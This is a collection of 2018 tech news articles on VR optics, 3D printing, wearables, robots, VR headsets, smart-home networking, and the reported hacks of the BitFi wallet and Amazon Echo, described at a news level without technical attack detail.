VR optics could help old folks keep the world in focus

The complex optics involved with putting a screen an inch away from the eye in VR headsets could make for smart glasses that correct for vision problems. These prototype “autofocals” from Stanford researchers use depth sensing and gaze tracking to bring the world into focus when someone lacks the ability to do it on their own.

The complex optics involved with putting a screen an inch away from the eye in VR headsets could make for smartglasses that correct for vision problems. These prototype “autofocals” from Stanford researchers use depth sensing and gaze tracking to bring the world into focus when someone lacks the ability to do it on their own.

I talked with lead researcher Nitish Padmanaban at SIGGRAPH in Vancouver, where he and the others on his team were showing off the latest version of the system. It’s meant, he explained, to be a better solution to the problem of presbyopia, which is basically when your eyes refuse to focus on close-up objects. It happens to millions of people as they age, even people with otherwise excellent vision.

There are, of course, bifocals and progressive lenses that bend light in such a way as to bring such objects into focus — purely optical solutions, and cheap as well, but inflexible, and they only provide a small “viewport” through which to view the world. And there are adjustable-lens glasses as well, but must be adjusted slowly and manually with a dial on the side. What if you could make the whole lens change shape automatically, depending on the user’s need, in real time?

That’s what Padmanaban and colleagues Robert Konrad and Gordon Wetzstein are working on, and although the current prototype is obviously far too bulky and limited for actual deployment, the concept seems totally sound.

Padmanaban previously worked in VR, and mentioned what’s called the convergence-accommodation problem. Basically, the way that we see changes in real life when we move and refocus our eyes from far to near doesn’t happen properly (if at all) in VR, and that can produce pain and nausea. Having lenses that automatically adjust based on where you’re looking would be useful there — and indeed some VR developers were showing off just that only 10 feet away. But it could also apply to people who are unable to focus on nearby objects in the real world, Padmanaban thought.

This is an old prototype, but you get the idea.

It works like this. A depth sensor on the glasses collects a basic view of the scene in front of the person: a newspaper is 14 inches away, a table three feet away, the rest of the room considerably more. Then an eye-tracking system checks where the user is currently looking and cross-references that with the depth map.

Having been equipped with the specifics of the user’s vision problem, for instance that they have trouble focusing on objects closer than 20 inches away, the apparatus can then make an intelligent decision as to whether and how to adjust the lenses of the glasses.

In the case above, if the user was looking at the table or the rest of the room, the glasses will assume whatever normal correction the person requires to see — perhaps none. But if they change their gaze to focus on the paper, the glasses immediately adjust the lenses (perhaps independently per eye) to bring that object into focus in a way that doesn’t strain the person’s eyes.

The whole process of checking the gaze, depth of the selected object and adjustment of the lenses takes a total of about 150 milliseconds. That’s long enough that the user might notice it happens, but the whole process of redirecting and refocusing one’s gaze takes perhaps three or four times that long — so the changes in the device will be complete by the time the user’s eyes would normally be at rest again.

“Even with an early prototype, the Autofocals are comparable to and sometimes better than traditional correction,” reads a short summary of the research published for SIGGRAPH. “Furthermore, the ‘natural’ operation of the Autofocals makes them usable on first wear.”

The team is currently conducting tests to measure more quantitatively the improvements derived from this system, and test for any possible ill effects, glitches or other complaints. They’re a long way from commercialization, but Padmanaban suggested that some manufacturers are already looking into this type of method and despite its early stage, it’s highly promising. We can expect to hear more from them when the full paper is published.

XYZPrinting announces the da Vinci Color Mini

XYZPrinting may have finally cracked the color 3D printing code. Their latest machine, the $1,599 da Vinci Color Mini is a full color printer that uses three CMY ink cartridges to stain the filament as it is extruded, allowing for up to 15 million color combinations. The printer is currently available for pre-order on Indiegogo […]

XYZPrinting may have finally cracked the color 3D printing code. Their latest machine, the $1,599 da Vinci Color Mini is a full color printer that uses three CMY ink cartridges to stain the filament as it is extruded, allowing for up to 15 million color combinations.

The printer is currently available for pre-order on Indiegogo for $999.

The printer can build objects 5.1″ x 5.1″ x 5.1″ in size and it can print PLA or PETG. A small ink cartridge stains the 3D Color-inkjet PLA as it comes out, creating truly colorful objects.

“Desktop full-color 3D printing is here. Now, consumers can purchase an easy-to-operate, affordable, compact full-color 3D printer for $30,000 less than market rate. This is revolutionary because we are giving the public access to technology that was once only available to industry professionals,” said Simon Shen, CEO of XYZprinting.

The new system is aimed at educational and home markets and, at less than a $1,000, it hits a unique and important sweet spot in terms of price. While the prints aren’t perfect, being able to print in full color for the price of a nicer single color 3D printer is pretty impressive.

Fitbit’s upcoming Charge 3 to sport full touchscreen, per leak

This appears to be the Fitbit Charge 3 and, if it is, several big changes are in the works for Fitbit’s premier fitness tracker band. The leak comes from Android Authority which points to the changes. First, the device has a full touchscreen rather than a clunky quasi-touchscreen like the Charge 2. From the touchscreen, […]

This appears to be the Fitbit Charge 3 and, if it is, several big changes are in the works for Fitbit’s premier fitness tracker band.

The leak comes from Android Authority which points to the changes. First, the device has a full touchscreen rather than a clunky quasi-touchscreen like the Charge 2. From the touchscreen, users can navigate the device and even reply to notifications and messages. Second, the Charge 3 will be swim-proof to 50 meters. Finally, and this is a bad one, the Charge 3 will not have GPS built-in meaning users will have to bring a smartphone along for a run if they want GPS data.

Price and availability was not reveled but chances are the device will hit the stores in the coming weeks ahead of the holidays.

This is a big change for Fitbit. If the above leak is correct on all points, Fitbit is pushing the Charge 3 into smartwatch territory. The drop of GPS is regrettable but the company probably has data showing a minority of wearers use the feature. With a full touchscreen, and a notification reply function, the Charge 3 is gaining a lot of functionality for its size.

This robot maintains tender, unnerving eye contact

Humans already find it unnerving enough when extremely alien-looking robots are kicked and interfered with, so one can only imagine how much worse it will be when they make unbroken eye contact and mirror your expressions while you heap abuse on them. This is the future we have selected.

Humans already find it unnerving enough when extremely alien-looking robots are kicked and interfered with, so one can only imagine how much worse it will be when they make unbroken eye contact and mirror your expressions while you heap abuse on them. This is the future we have selected.

The Simulative Emotional Expression Robot, or SEER, was on display at SIGGRAPH here in Vancouver, and it’s definitely an experience. The robot, a creation of Takayuki Todo, is a small humanoid head and neck that responds to the nearest person by making eye contact and imitating their expression.

It doesn’t sound like much, but it’s pretty complex to execute well, which, despite a few glitches, SEER managed to do.

At present it alternates between two modes: imitative and eye contact. Both, of course, rely on a nearby (or, one can imagine, built-in) camera that recognizes and tracks the features of your face in real time.

In imitative mode the positions of the viewer’s eyebrows and eyelids, and the position of their head, are mirrored by SEER. It’s not perfect — it occasionally freaks out or vibrates because of noisy face data — but when it worked it managed rather a good version of what I was giving it. Real humans are more expressive, naturally, but this little face with its creepily realistic eyes plunged deeply into the uncanny valley and nearly climbed the far side.

Eye contact mode has the robot moving on its own while, as you might guess, making uninterrupted eye contact with whoever is nearest. It’s a bit creepy, but not in the way that some robots are — when you’re looked at by inadequately modeled faces, it just feels like bad VFX. In this case it was more the surprising amount of empathy you suddenly feel for this little machine.

That’s largely due to the delicate, childlike, neutral sculpting of the face and highly realistic eyes. If an Amazon Echo had those eyes, you’d never forget it was listening to everything you say. You might even tell it your problems.

This is just an art project for now, but the tech behind it is definitely the kind of thing you can expect to be integrated with virtual assistants and the like in the near future. Whether that’s a good thing or a bad one I guess we’ll find out together.

“Unhackable” BitFi crypto wallet has been hacked

The BitFi crypto wallet was supposed to be unhackable and none other than famous weirdo John McAfee claimed that the device – essentially an Android-based mini tablet – would withstand any attack. Spoiler alert: it couldn’t. First, a bit of background. The $120 device launched at the beginning of this month to much fanfare. It […]

The BitFi crypto wallet was supposed to be unhackable and none other than famous weirdo John McAfee claimed that the device – essentially an Android-based mini tablet – would withstand any attack. Spoiler alert: it couldn’t.

First, a bit of background. The $120 device launched at the beginning of this month to much fanfare. It consisted of a device that McAfee claimed contained no software or storage and was instead a standalone wallet similar to the Trezor. The website featured a bold claim by McAfee himself, one that would give a normal security researcher pause:

Further, the company offered a bug bounty that seems to be slowly being eroded by outside forces. They asked hackers to pull coins off of a specially prepared $10 wallet, a move that is uncommon in the world of bug bounties. They wrote:

We deposit coins into a Bitfi wallet
If you wish to participate in the bounty program, you will purchase a Bitfi wallet that is preloaded with coins for just an additional $10 (the reason for the charge is because we need to ensure serious inquiries only)
If you successfully extract the coins and empty the wallet, this would be considered a successful hack
You can then keep the coins and Bitfi will make a payment to you of $250,000
Please note that we grant anyone who participates in this bounty permission to use all possible attack vectors, including our servers, nodes, and our infrastructure

Hackers began attacking the device immediately, eventually hacking it to find the passphrase used to move crypto in and out of the the wallet. In a detailed set of Tweets, security researchers Andrew Tierney and Alan Woodward began finding holes by attacking the operating system itself. However, this did not match the bounty to the letter, claimed BitFi, even though they did not actually ship any bounty-ready devices.

Then, to add insult injury, the company earned a Pwnies award at security conference Defcon. The award was given for worst vendor response. As hackers began dismantling the device, BitFi went on the defensive, consistently claiming that their device was secure. And the hackers had a field day. One hacker, 15-year-old Saleem Rashid, was able to play Doom on the device.

The hacks kept coming. McAfee, for his part, kept refusing to accept the hacks as genuine.

Unfortunately, the latest hack may have just fulfilled all of BitFi’s requirements. Rashid and Tierney have been able to pull cash out of the wallet by hacking the passphrase, a primary requirement for the bounty. “We have sent the seed and phrase from the device to another server, it just gets sent using netcat, nothing fancy.” Tierney said. “We believe all conditions have been met.”

The end state of this crypto mess? BitFi did what most hacked crypto companies do: double down on the threats. In a recently deleted Tweet they made it clear that they were not to be messed with:

The researchers, however, may still have the last laugh.

StarVR’s One headset flaunts eye-tracking and a double-wide field of view

While the field of VR headsets used to be more or less limited to Oculus and Vive, numerous competitors have sprung up as the technology has matured — and some are out to beat the market leaders at their own game. StarVR’s latest headset brings eye-tracking and a seriously expanded field of view to the game, and the latter especially is a treat to experience.

While the field of VR headsets used to be more or less limited to Oculus and Vive, numerous competitors have sprung up as the technology has matured — and some are out to beat the market leaders at their own game. StarVR’s latest headset brings eye-tracking and a seriously expanded field of view to the game, and the latter especially is a treat to experience.

The company announced the new hardware at SIGGRAPH in Vancouver, where I got to go hands-on and eyes-in with the headset. Before you get too excited, though, keep in mind this set is meant for commercial applications — car showrooms, aircraft simulators, and so on. What that means is it’s going to be expensive and not as polished a user experience as consumer-focused sets.

That said, the improvements present in the StarVR One are significant and immediately obvious. Most important is probably the expanded FOV — 210 degrees horizontal and 130 vertical. That’s nearly twice as wide as the 110 degrees wide that the most popular headsets have, and believe me, it makes a difference. (I haven’t tried the Pimax 8K, which has a similarly wide FOV.)

On Vive and Oculus sets I always had the feeling that I was looking through a hole into the VR world — a large hole, to be sure, but having your peripheral vision be essentially blank made it a bit claustrophobic.

In the StarVR headset, I felt like the virtual environment was actually around me, not just in front of me. I moved my eyes around much more rather than turning my head, with no worries about accidentally gazing at the fuzzy edge of the display. A 90 Hz refresh rate meant things were nice and smooth.

To throw shade at competitors, the demo I played (I was a giant cyber-ape defending a tower) could switch between the full FOV and a simulation of the 110-degree one found in other headsets. I suspect it was slightly exaggerated, but the difference really is clear.

It’s reasonably light and comfortable — no VR headset is really either. But it doesn’t feel as chunky as it looks.

The resolution of the custom AMOLED display is supposedly 5K. But the company declined to specify the actual resolution when I asked. They did, however, proudly proclaim full RGB pixels and 16 million sub-pixels. Let’s do the math:

16 million divided by 3 makes around 5.3 million full pixels. 5K isn’t a real standard, just shorthand for having around 5,000 horizontal pixels between the two displays. Divide 5.3 million by that and you get 1060. Rounding those off to semi-known numbers gives us 2560 pixels (per eye) for the horizontal and 1080 for the vertical resolution.

That doesn’t fit the approximately 16:10 ratio of the field of view, but who knows? Let’s not get too bogged down in unknowns. Resolution isn’t everything — but generally, the more pixels the better.

The other major new inclusion is an eye-tracking system provided by Tobii. We knew eye-tracking in VR was coming; it was demonstrated at CES, and the Fove Kickstarter showed it was at least conceivable to integrate into a headset now-ish.

Unfortunately the demos of eye-tracking were pretty limited (think a heatmap of where you looked on a car) so, being hungry, I skipped them. The promise is good enough for now — eye tracking allows for all kinds of things, including a “foveated rendering” that focuses display power where you’re looking. This too was not being shown, however, and it strikes me that it is likely phenomenally difficult to pull off well — so it may be a while before we see a good demo of it.

One small but welcome improvement that eye-tracking also enables is automatic detection of intrapupillary distance, or IPD — it’s different for everyone and can be important to rendering the image correctly. One less thing to worry about.

The StarVR One is compatible with SteamVR tracking, or you can get the XT version and build your own optical tracking rig — that’s for the commercial providers for whom it’s an option.

Although this headset will be going to high-end commercial types, you can bet that the wide FOV and eye tracking in it will be standard in the next generation of consumer devices. Having tried most of the other headsets, I can say with certainty that I wouldn’t want to go back to some of them after having experienced this one. VR is still a long way off from convincing me it’s worthwhile, but major improvements like these definitely help.

This bipedal robot has a flying head

Making a bipedal robot is hard. You have to make sure maintain exquisite balance at all times and, even with the amazing things Atlas can do, there is still a chance that your crazy robot will fall over and bop its electronic head. But what if that head is a quadcopter? University of Tokyo have […]

Making a bipedal robot is hard. You have to make sure maintain exquisite balance at all times and, even with the amazing things Atlas can do, there is still a chance that your crazy robot will fall over and bop its electronic head. But what if that head is a quadcopter?

University of Tokyo have done just that with their wild Aerial-Biped. The robot isn’t completely bipedal but it’s designed instead to act like a bipedal robot without the tricky issue of being truly bipedal. Think of the these legs as more a sort of fun bit of puppetry that mimics walking but doesn’t really walk.

“The goal is to develop a robot that has the ability to display the appearance of bipedal walking with dynamic mobility, and to provide a new visual experience. The robot enables walking motion with very slender legs like those of a flamingo without impairing dynamic mobility. This approach enables casual users to choreograph biped robot walking without expertise. In addition, it is much cheaper compared to a conventional bipedal walking robot,” the team told IEEE.

The robot is similar to the bizarre-looking Ballu, a blimp robot with a floating head and spindly legs. The new robot learned how to walk convincingly through machine learning, a feat that gives it a realistic gait even though it is really an aerial system. It’s definitely a clever little project and could be interesting at a theme park or in an environment where a massive bipedal robot falling over on someone might be discouraged.

This happy robot helps kids with autism

A little bot named QTrobot from LuxAI could be the link between therapists, parents, and autistic children. The robot, which features an LCD face and robotic arms, allows kids who are overwhelmed by human contact to become more comfortable in a therapeutic setting. The project comes from LuxAI, a spin-off of the University of Luxembourg. […]

A little bot named QTrobot from LuxAI could be the link between therapists, parents, and autistic children. The robot, which features an LCD face and robotic arms, allows kids who are overwhelmed by human contact to become more comfortable in a therapeutic setting.

The project comes from LuxAI, a spin-off of the University of Luxembourg. They will present their findings at the RO-MAN 2018 conference at the end of this month.

“The robot has the ability to create a triangular interaction between the human therapist, the robot, and the child,” co-founder Aida Nazarikhorram told IEEE. “Immediately the child starts interacting with the educator or therapist to ask questions about the robot or give feedback about its behavior.”

The robot reduces anxiety in autistic children and the researchers saw many behaviors – hand flapping, for example – slow down with the robot in the mix.

Interestingly the robot is a better choice for children than an app or tablet. Because the robot is “embodied,” the researchers found that it that draws attention and improves learning, especially when compared to a standard iPad/educational app pairing. In other words children play with tablets and work with robots.

The robot is entirely self-contained and easily programmable. It can run for hours at a time and includes a 3D camera and full processor.

The researchers found that the robot doesn’t become the focus of the therapy but instead helps the therapist connect with the patient. This, obviously, is an excellent outcome for an excellent (and cute) little piece of technology.

Security researchers found a way to hack into the Amazon Echo

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug. The hack involved a modified […]

Hackers at DefCon have exposed new security concerns around smart speakers. Tencent’s Wu HuiYu and Qian Wenxiang spoke at the security conference with a presentation called Breaking Smart Speakers: We are Listening to You, explaining how they hacked into an Amazon Echo speaker and turned it into a spy bug.

The hack involved a modified Amazon Echo, which had had parts swapped out, including some that had been soldered on. The modified Echo was then used to hack into other, non-modified Echos by connecting both the hackers’ Echo and a regular Echo to the same LAN.

This allowed the hackers to turn their own, modified Echo into a listening bug, relaying audio from the other Echo speakers without those speakers indicating that they were transmitting.

This method was very difficult to execute, but represents an early step in exploiting Amazon’s increasingly popular smart speaker.

The researchers notified Amazon of the exploit before the presentation, and Amazon has already pushed a patch, according to Wired.

Still, the presentation demonstrates how one Echo, with malicious firmware, could potentially alter a group of speakers when connected to the same network, posing concerns with the idea of Echos in hotels.

Wired explained how the networking feature of the Echo allowed for the hack:

If they can then get that doctored Echo onto the same Wi-Fi network as a target device, the hackers can take advantage of a software component of Amazon’s speakers, known as Whole Home Audio Daemon, that the devices use to communicate with other Echoes in the same network. That daemon contained a vulnerability that the hackers found they could exploit via their hacked Echo to gain full control over the target speaker, including the ability to make the Echo play any sound they chose, or more worryingly, silently record and transmit audio to a faraway spy.

An Amazon spokesperson told Wired that “customers do not need to take any action as their devices have been automatically updated with security fixes,” adding that “this issue would have required a malicious actor to have physical access to a device and the ability to modify the device hardware.”

To be clear, the actor would only need physical access to their own Echo to execute the hack.

While Amazon has dismissed concerns that its voice activated devices are monitoring you, hackers at this year’s DefCon proved that they can.

Samsung turns to Plume for new mesh Wifi product line

Samsung today is announcing an updated version of its Wifi product line. The company partnered with Palo Alto-based Plume Design to provide software that powers the devices. According to Samsung, Plume’s platform uses artificial intelligence to allocate bandwidth across connected devices while delivering the best possible wifi coverage throughout a home. Plus, by using Plume, […]

Samsung today is announcing an updated version of its Wifi product line. The company partnered with Palo Alto-based Plume Design to provide software that powers the devices. According to Samsung, Plume’s platform uses artificial intelligence to allocate bandwidth across connected devices while delivering the best possible wifi coverage throughout a home. Plus, by using Plume, Samsung gets to say its Wifi system uses AI, which is a big marketing win.

The system also includes a SmartThings Hub like the previous generation allowing owners to build a connected IoT home without having to buy another box.

“Integrating our adaptive home Wi-Fi technology and a rich set of consumer features into SmartThings’ large, open ecosystem truly elevates the smart home experience,” said Fahri Diner, co-founder and CEO, Plume, said in a released statement. “Samsung gives you myriad devices to consume content and connect, and Plume ensures that your Wi-Fi network delivers a superior user experience to all of those devices.”

Plume Design was founded in 2014 and was one of the first to offer a consumer-facing mesh network product line. Since then, though, nearly every home networking company has followed suit and Plume has been forced to find new ways to make use of its technology. In June 2017, Comcast invested in Plume and later launched xFi using Plume technology to power the mesh networking product. According to Comcast at the time of xFi’s nationwide launch, Comcast licensed the Plume technology, then reconfigured some aspects of it to integrate xFi. It also designed its own pods in-house — which sounds similar to what Samsung is doing here too.

Plume Design has to date raised $42.2M over three rounds of funding.

Samsung’s new SmartThings WiFi Mesh Router is priced competitively with comparable products. A three pack of the units cost $279 while a single unit is $119.